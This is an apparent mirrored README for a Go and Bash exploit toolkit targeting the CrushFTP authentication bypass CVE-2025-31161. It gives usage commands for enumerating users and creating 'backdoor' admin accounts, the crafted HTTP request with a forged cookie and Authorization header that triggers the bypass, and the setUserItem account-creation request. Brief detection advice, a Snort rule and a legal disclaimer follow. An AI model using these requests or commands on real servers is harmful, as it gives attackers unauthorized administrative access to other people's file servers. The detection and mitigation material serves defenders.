关联漏洞
介绍
# CrushFTP Authentication Bypass - CVE-2025-31161
[](https://opensource.org/licenses/MIT)
[](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31161)
[](https://golang.org/)
[](https://www.gnu.org/software/bash/)
A comprehensive toolkit for exploiting CVE-2025-31161, an authentication bypass vulnerability in CrushFTP that allows unauthorized user account creation.
## 🔍 What is CVE-2025-31161?
CVE-2025-31161 is a critical authentication bypass vulnerability in CrushFTP that allows attackers to create unauthorized user accounts without proper authentication. This vulnerability exists in the web interface's user management functionality.
### Technical Details
- **CVSS Score**: TBD
- **Affected Software**: CrushFTP Web Interface
- **Attack Vector**: Network
- **Authentication Required**: None
- **Impact**: Complete system compromise through unauthorized account creation
## 🚀 Features
- **Multi-Language Support**: Go and Bash implementations
- **Smart Vulnerability Detection**: Automatically checks if target is vulnerable before exploitation
- **User Enumeration**: List existing users on vulnerable targets
- **User Creation**: Create new administrative accounts
- **Interactive Mode**: Prompts for credentials only when target is confirmed vulnerable
- **Shorthand Flags**: Quick access with `-t`, `-p`, `-tu` flags
- **Custom Port Support**: Configurable port for different deployment scenarios
- **Educational Focus**: Designed for CTF challenges and security research
## 📁 Repository Structure
```
CrushFTP-auth-bypass-CVE-2025-31161/
├── README.md # This documentation
├── cve-2025-31161.go # Go implementation (recommended)
├── cve-2025-31161.sh # Bash implementation
└── LICENSE # MIT License
```
## 🛠️ Installation & Requirements
### Prerequisites
#### For Go Version (Recommended)
```bash
# Install Go (if not already installed)
sudo apt install golang-go
# or
wget https://go.dev/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
```
#### For Bash Version
```bash
# Requires curl (usually pre-installed)
sudo apt install curl
```
### Quick Setup
```bash
git clone <repository-url>
cd CrushFTP-auth-bypass-CVE-2025-31161
chmod +x cve-2025-31161.sh
```
## 🎯 Usage
### Go Version (Recommended)
#### List Users
```bash
# Basic usage with shorthand flags
go run cve-2025-31161.go -t example.com -lu
# With custom port
go run cve-2025-31161.go -t example.com -p 8080 -lu
# Long form flags
go run cve-2025-31161.go --target_host example.com --port 8080 -lu
```
#### Add New User
```bash
# Create new user (will prompt for username/password)
go run cve-2025-31161.go -t example.com -au
# With custom target user (default: crushadmin)
go run cve-2025-31161.go -t example.com -tu admin -au
# Long form flags
go run cve-2025-31161.go --target_host example.com --target_user admin -au
```
### Bash Version
#### List Users
```bash
# Basic usage
./cve-2025-31161.sh -t example.com -lu
# With custom port
./cve-2025-31161.sh -t example.com -p 8080 -lu
```
#### Add New User
```bash
# Create new user
./cve-2025-31161.sh -t example.com -au
# With custom settings
./cve-2025-31161.sh -t example.com -p 8080 -tu crushadmin -au
```
### Available Flags
| Flag | Long Form | Description | Default |
|------|-----------|-------------|---------|
| `-t` | `--target_host` | Target hostname or IP (required) | - |
| `-p` | `--port` | Target port | 80 |
| `-tu` | `--target_user` | Target user for exploitation | crushadmin |
| `-lu` | `--list-users` | List existing users | - |
| `-au` | `--add-user` | Add new user (interactive) | - |
| | `--help` | Show help message | - |
### Usage Examples
```bash
# Example 1: Enumerate users on target
go run cve-2025-31161.go -t ftp.example.htb -lu
# Example 2: Create backdoor account
go run cve-2025-31161.go -t ftp.example.htb -au
# Then enter: username: backdoor, password: P@ssw0rd123
# Example 3: Non-standard port with user enumeration
./cve-2025-31161.sh -t 192.168.1.100 -p 9090 -lu
# View help
./cve-2025-31161.sh --help
```
## 🔄 How It Works
```mermaid
flowchart TD
A[Start Exploit] --> B[Check Target Connectivity]
B --> C{Target Reachable?}
C -->|No| D[Exit: Connection Failed]
C -->|Yes| E[Send getUserList Request]
E --> F{Response Contains OK?}
F -->|No| G[Exit: Not Vulnerable]
F -->|Yes| H[Target is Vulnerable!]
H --> I{Mode Selected?}
I -->|List Users -lu| J[Parse XML Response]
J --> K[Display User List]
K --> L[Exit: Success]
I -->|Add User -au| M[Prompt for Username]
M --> N[Prompt for Password]
N --> O[Send Warm-up Request]
O --> P[Craft User Creation Payload]
P --> Q[Send setUserItem Request]
Q --> R{User Created Successfully?}
R -->|Yes| S[Success: Account Created]
R -->|No| T[Failed: Exploitation Failed]
style A fill:#e1f5fe
style H fill:#c8e6c9
style K fill:#81c784
style S fill:#4caf50
style D fill:#ffcdd2
style G fill:#ffcdd2
style T fill:#ffcdd2
```
## 🧪 Exploit Flow Explained
### Step 1: Vulnerability Detection
The script first sends a `getUserList` request to check if the target is vulnerable:
```http
GET /webinterface/function/?command=getUserList&serverGroup=MainUsers&c2f=wIwV
Cookie: CrushAuth=1758816957058_vuiPVygdYnM1kzYGOs9d3tzIbFWIwV
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
```
If the response contains `<response_status>OK</response_status>`, the target is vulnerable.
### Step 2a: User Enumeration (List Users Mode)
When using the `-lu` flag, the script parses the XML response and extracts usernames:
```xml
<user_list type="vector">
<user_list_subitem>ben</user_list_subitem>
<user_list_subitem>crushadmin</user_list_subitem>
<user_list_subitem>default</user_list_subitem>
</user_list>
```
Output:
```
[+] Users:
- ben
- crushadmin
- default
```
### Step 2b: User Account Creation (Add User Mode)
When using the `-au` flag, the script sends a `setUserItem` request with malicious XML payload:
```http
POST /webinterface/function/
Content-Type: application/x-www-form-urlencoded
command=setUserItem&data_action=replace&serverGroup=MainUsers&username=newuser&user=<USER_XML>&xmlItem=user&vfs_items=<VFS_XML>&permissions=<PERMISSIONS_XML>&c2f=31If
```
### Step 3: Verification
The script checks for `<response_status>OK</response_status>` in the response to confirm successful user creation.
---
## ⚠️ Vulnerability Details
### Root Cause
The vulnerability stems from insufficient authentication checks in the CrushFTP web interface's user management functionality. The application accepts user creation requests without properly validating the caller's permissions.
### Impact Assessment
- **Confidentiality**: HIGH - Unauthorized access to file system
- **Integrity**: HIGH - Ability to modify/upload files
- **Availability**: MEDIUM - Potential for resource exhaustion
### Attack Scenarios
1. **Initial Access**: Create backdoor accounts for persistent access
2. **Privilege Escalation**: Create admin-level accounts
3. **Data Exfiltration**: Access sensitive files through FTP interface
4. **Lateral Movement**: Use compromised FTP server as pivot point
---
## 🛡️ Detection & Mitigation
### Detection Methods
- Monitor for unusual `setUserItem` requests in web logs
- Check for new user accounts created outside normal processes
- Implement anomaly detection for authentication bypass patterns
### Mitigation Strategies
1. **Immediate**: Block access to `/webinterface/function/` endpoints
2. **Short-term**: Update to patched CrushFTP version
3. **Long-term**: Implement proper authentication controls
### Network Signatures
```bash
# Snort/Suricata Rule Example
alert http any any -> any any (msg:"CrushFTP CVE-2025-31161 Exploit Attempt"; flow:established,to_server; content:"setUserItem"; http_uri; content:"serverGroup=MainUsers"; http_client_body; sid:1000001; rev:1;)
```
---
## 🎓 Educational Use Cases
### CTF Scenarios
- **Web Application Security**: Understanding authentication bypass vulnerabilities
- **Penetration Testing**: Demonstrating real-world exploitation techniques
- **Red Team Exercises**: Simulating APT-style attacks
### Learning Objectives
- Understanding HTTP request manipulation
- XML injection techniques
- Authentication bypass methodologies
- Multi-language exploit development
## 🚨 Legal Disclaimer
⚠️ **IMPORTANT**: This tool is designed for:
- Educational purposes
- Authorized penetration testing
- CTF competitions
- Security research in controlled environments
**DO NOT USE** on systems without explicit written permission. Unauthorized access to computer systems is illegal and may result in severe legal consequences.
## 🤝 Contributing
Contributions are welcome! Please:
1. Fork the repository
2. Create a feature branch (`git checkout -b feature/improvement`)
3. Commit your changes (`git commit -am 'Add new feature'`)
4. Push to the branch (`git push origin feature/improvement`)
5. Create a Pull Request
### Development Guidelines
- Follow existing code style
- Add comprehensive comments
- Test on multiple target environments
- Update documentation for new features
## 📝 Version History
| Version | Date | Changes |
|---------|------|---------|
| 1.0.0 | 2025-01-XX | Initial release with Go and Bash implementations |
| 1.1.0 | 2025-01-XX | Interactive mode and vulnerability detection |
| 1.2.0 | 2025-10-02 | Added user enumeration (-lu), separate add user mode (-au), shorthand flags (-t, -p, -tu) |
## 📚 References
- [CVE-2025-31161 Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31161)
- [CrushFTP Official Website](https://www.crushftp.com/)
- [OWASP Authentication Bypass](https://owasp.org/www-community/attacks/Authentication_bypass)
- [Original Research by Immersive Labs](https://github.com/Immersive-Labs-Sec/CVE-2025-31161)
---
## 📧 Contact
For questions, suggestions, or security concerns, please open an issue in this repository.
文件快照
[4.0K] /data/pocs/12e70c57808d0606fa170381ddbc49bc3de74ba9
├── [7.3K] cve-2025-31161.go
├── [7.5K] cve-2025-31161.sh
└── [ 10K] README.md
1 directory, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。